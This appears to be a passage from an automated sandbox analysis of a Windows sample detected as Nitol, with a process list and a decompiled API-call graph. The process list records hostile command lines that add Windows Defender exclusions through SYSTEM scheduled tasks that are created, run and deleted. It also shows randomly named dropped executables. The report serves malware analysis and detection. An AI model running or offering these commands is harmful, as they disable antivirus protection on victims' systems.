                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:12
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:13
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:06:15:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff779400000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:06:15:13
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:06:15:13
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:06:15:13
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff779400000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:25
                                                  Start time:06:15:14
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:26
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:29
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:30
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:31
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff779400000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:32
                                                  Start time:06:15:15
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:33
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:34
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Run /TN "Task1"
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:36
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff7b6450000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:37
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                  Imagebase:0x7ff604930000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:06:15:16
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\reg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                  Imagebase:0x7ff779400000
                                                  File size:77'312 bytes
                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:06:15:47
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
                                                  Imagebase:0xf60000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Has exited:false

                                                  Target ID:41
                                                  Start time:06:15:50
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
                                                  Imagebase:0xf60000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:06:15:50
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\K5YQV85\6WWeC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\K5YQV85\6WWeC.exe"
                                                  Imagebase:0x520000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:43
                                                  Start time:06:15:51
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c echo.>c:\xxxx.ini
                                                  Imagebase:0x1c0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:06:15:51
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:06:15:51
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
                                                  Imagebase:0xf60000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:06:16:01
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\Twhtlb\Twhtlb.exe"
                                                  Imagebase:0xf60000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:06:16:01
                                                  Start date:02/01/2025
                                                  Path:C:\Program Files (x86)\K5YQV85\6WWeC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\K5YQV85\6WWeC.exe"
                                                  Imagebase:0x520000
                                                  File size:54'152 bytes
                                                  MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:30.8%
                                                    Total number of Nodes:480
                                                    Total number of Limit Nodes:7
                                                    execution_graph 13991 140005df3 13992 140005e71 13991->13992 13993 140005e84 CreateFileA 13992->13993 13994 140005f50 __CxxFrameHandler 13993->13994 13995 140005fc3 malloc ReadFile 13994->13995 15432 140007412 15433 140007333 15432->15433 15434 140007403 15433->15434 15435 1400073e0 LdrLoadDll 15433->15435 15435->15433 15441 7ffda55d11b0 15450 7ffda55d1209 15441->15450 15442 7ffda55d1b70 _log10_special 8 API calls 15445 7ffda55d14d3 15442->15445 15443 7ffda55d1b90 51 API calls 15459 7ffda55d1300 BuildCatchObjectHelperInternal 15443->15459 15444 7ffda55d14f0 15474 7ffda55d1a40 15444->15474 15447 7ffda55d12c7 15449 7ffda55d1b90 51 API calls 15447->15449 15448 7ffda55d129e 15451 7ffda55d14f6 15448->15451 15460 7ffda55d1b90 15448->15460 15452 7ffda55d12b9 BuildCatchObjectHelperInternal 15449->15452 15450->15444 15450->15447 15450->15448 15450->15452 15450->15459 15477 7ffda55d1110 15451->15477 15452->15443 15457 7ffda55d14eb 15469 7ffda55d79cc 15457->15469 15459->15442 15461 7ffda55d1b9b 15460->15461 15462 7ffda55d12b0 15461->15462 15463 7ffda55d7a4c BuildCatchObjectHelperInternal 2 API calls 15461->15463 15464 7ffda55d1bba 15461->15464 15462->15452 15462->15457 15463->15461 15465 7ffda55d1bc5 15464->15465 15483 7ffda55d21f0 15464->15483 15467 7ffda55d1110 Concurrency::cancel_current_task 51 API calls 15465->15467 15468 7ffda55d1bcb 15467->15468 15470 7ffda55d7844 _invalid_parameter_noinfo 47 API calls 15469->15470 15471 7ffda55d79e5 15470->15471 15472 7ffda55d79fc _invalid_parameter_noinfo_noreturn 17 API calls 15471->15472 15473 7ffda55d79fa 15472->15473 15487 7ffda55d1b34 15474->15487 15478 7ffda55d111e Concurrency::cancel_current_task 15477->15478 15479 7ffda55d3990 std::_Xinvalid_argument 2 API calls 15478->15479 15480 7ffda55d112f 15479->15480 15481 7ffda55d379c __std_exception_copy 49 API calls 15480->15481 15482 7ffda55d1159 15481->15482 15484 7ffda55d21fe Concurrency::cancel_current_task 15483->15484 15485 7ffda55d3990 std::_Xinvalid_argument 2 API calls 15484->15485 15486 7ffda55d220f 15485->15486 15492 7ffda55d1ab0 15487->15492 15490 7ffda55d3990 std::_Xinvalid_argument 2 API calls 15491 7ffda55d1b56 15490->15491 15495 7ffda55d379c 15492->15495 15496 7ffda55d37bd 15495->15496 15500 7ffda55d1ae4 15495->15500 15499 7ffda55d37f2 15496->15499 15496->15500 15501 7ffda55d89bc 15496->15501 15510 7ffda55d7b58 15499->15510 15500->15490 15502 7ffda55d89c9 15501->15502 15503 7ffda55d89d3 15501->15503 15502->15503 15508 7ffda55d89ee 15502->15508 15504 7ffda55d8bc0 __std_exception_copy 11 API calls 15503->15504 15505 7ffda55d89da 15504->15505 15506 7ffda55d79ac _invalid_parameter_noinfo 47 API calls 15505->15506 15507 7ffda55d89e6 15506->15507 15507->15499 15508->15507 15509 7ffda55d8bc0 __std_exception_copy 11 API calls 15508->15509 15509->15505 15511 7ffda55d8be0 15510->15511 15512 7ffda55d8c16 15511->15512 15513 7ffda55d8be5 HeapFree 15511->15513 15512->15500 15513->15512 15514 7ffda55d8c00 GetLastError 15513->15514 15515 7ffda55d8c0d __free_lconv_num 15514->15515 15516 7ffda55d8bc0 __std_exception_copy 11 API calls 15515->15516 15516->15512 16215 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 16218 1400054e0 16215->16218 16217 1400136ef 16219 140005506 _lock 16218->16219 16220 14000552c 16218->16220 16219->16217 16221 1400074d0 LdrLoadDll 16220->16221 16222 140005536 16221->16222 16223 140008370 3 API calls 16222->16223 16227 140005545 __CxxFrameHandler 16223->16227 16224 1400055b8 16225 140008de0 _lock 2 API calls 16224->16225 16226 1400055c0 sprintf_s 16225->16226 16226->16219 16227->16224 16228 1400074f0 LdrLoadDll 16227->16228 16229 140005561 CreateThread 16228->16229 16229->16226 16230 1400055b0 GetLastError 16229->16230 16230->16224 14000 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14001 140005ab1 14000->14001 14002 140005add GetVersionExA 14000->14002 14003 140005abf 14001->14003 14050 140009540 14001->14050 14004 140005b0e GetProcessHeap HeapFree 14002->14004 14005 140005af0 GetProcessHeap HeapFree 14002->14005 14058 140009300 14003->14058 14010 140005b3c 14004->14010 14008 140005d0b 14005->14008 14009 140005ac9 14069 140008510 GetModuleHandleA 14009->14069 14073 14000a310 HeapCreate 14010->14073 14013 140005ad3 14013->14008 14014 140005bec 14015 140005c12 14014->14015 14016 140005bf0 14014->14016 14018 140005c17 14015->14018 14017 140005bfe 14016->14017 14019 140009540 _lock 12 API calls 14016->14019 14020 140009300 _lock 10 API calls 14017->14020 14021 140005c3d 14018->14021 14023 140005c29 14018->14023 14025 140009540 _lock 12 API calls 14018->14025 14019->14017 14022 140005c08 14020->14022 14076 140009f50 GetStartupInfoA 14021->14076 14024 140008510 _lock 3 API calls 14022->14024 14026 140009300 _lock 10 API calls 14023->14026 14024->14015 14025->14023 14027 140005c33 14026->14027 14029 140008510 _lock 3 API calls 14027->14029 14029->14021 14030 140005c56 14096 140009e30 14030->14096 14034 140005c5b 14114 140009c30 14034->14114 14038 140005c73 14039 140005c81 14038->14039 14040 1400084e0 _lock 12 API calls 14038->14040 14144 140009690 14039->14144 14040->14039 14042 140005c86 14043 140005c94 14042->14043 14045 1400084e0 _lock 12 API calls 14042->14045 14156 140008650 14043->14156 14045->14043 14046 140005c9e 14047 1400084e0 _lock 12 API calls 14046->14047 14048 140005ca9 14046->14048 14047->14048 14160 140001520 14048->14160 14051 14000954e _lock 14050->14051 14052 14000961c 14051->14052 14053 14000959c 14051->14053 14055 1400095c9 GetStdHandle 14051->14055 14052->14003 14054 140009300 _lock 10 API calls 14053->14054 14054->14052 14055->14053 14056 1400095dc 14055->14056 14056->14053 14057 1400095e2 WriteFile 14056->14057 14057->14053 14061 140009320 _lock 14058->14061 14059 140009330 14059->14009 14060 1400094dc GetStdHandle 14060->14059 14062 1400094ef 14060->14062 14061->14059 14061->14060 14064 140009375 _lock 14061->14064 14062->14059 14063 1400094f5 WriteFile 14062->14063 14063->14059 14064->14059 14065 1400093b9 GetModuleFileNameA 14064->14065 14066 1400093d9 _lock 14065->14066 14178 14000f000 14066->14178 14070 140008543 ExitProcess 14069->14070 14071 14000852a GetProcAddress 14069->14071 14071->14070 14072 14000853f 14071->14072 14072->14070 14074 14000a334 14073->14074 14075 14000a339 HeapSetInformation 14073->14075 14074->14014 14075->14014 14204 140008370 14076->14204 14078 140005c48 14078->14030 14089 1400084e0 14078->14089 14079 14000a1c4 GetStdHandle 14085 14000a17c 14079->14085 14080 140008370 3 API calls 14086 140009f8a 14080->14086 14081 14000a239 SetHandleCount 14081->14078 14082 14000a1d8 GetFileType 14082->14085 14083 14000a0e3 14083->14078 14084 14000a11c GetFileType 14083->14084 14083->14085 14209 14000edc0 14083->14209 14084->14083 14085->14078 14085->14079 14085->14081 14085->14082 14088 14000edc0 _lock 3 API calls 14085->14088 14086->14078 14086->14080 14086->14083 14086->14085 14086->14086 14088->14085 14090 140009540 _lock 12 API calls 14089->14090 14091 1400084ed 14090->14091 14092 140009300 _lock 10 API calls 14091->14092 14093 1400084f4 14092->14093 14094 1400073e0 _lock LdrLoadDll 14093->14094 14095 140008500 14094->14095 14097 140009e7c 14096->14097 14098 140009e3e GetCommandLineW 14096->14098 14101 140009e81 GetCommandLineW 14097->14101 14102 140009e69 14097->14102 14099 140009e49 GetCommandLineW 14098->14099 14100 140009e5e GetLastError 14098->14100 14099->14100 14100->14102 14103 140009e75 14100->14103 14101->14102 14102->14103 14104 140009e91 GetCommandLineA MultiByteToWideChar 14102->14104 14103->14034 14105 140009ec8 14104->14105 14106 140009ed9 14104->14106 14105->14034 14107 140008370 3 API calls 14106->14107 14108 140009eeb 14107->14108 14109 140009f32 14108->14109 14110 140009ef3 MultiByteToWideChar 14108->14110 14109->14034 14111 140009f13 14110->14111 14112 140009f2a 14110->14112 14111->14034 14223 140008de0 14112->14223 14115 140009c52 GetEnvironmentStringsW 14114->14115 14116 140009c86 14114->14116 14117 140009c6c GetLastError 14115->14117 14123 140009c60 14115->14123 14118 140009c91 GetEnvironmentStringsW 14116->14118 14119 140009c77 14116->14119 14117->14116 14117->14119 14121 140005c67 14118->14121 14118->14123 14120 140009d09 GetEnvironmentStrings 14119->14120 14119->14121 14120->14121 14122 140009d17 14120->14122 14140 1400099c0 GetModuleFileNameW 14121->14140 14125 140009d58 14122->14125 14128 140009d20 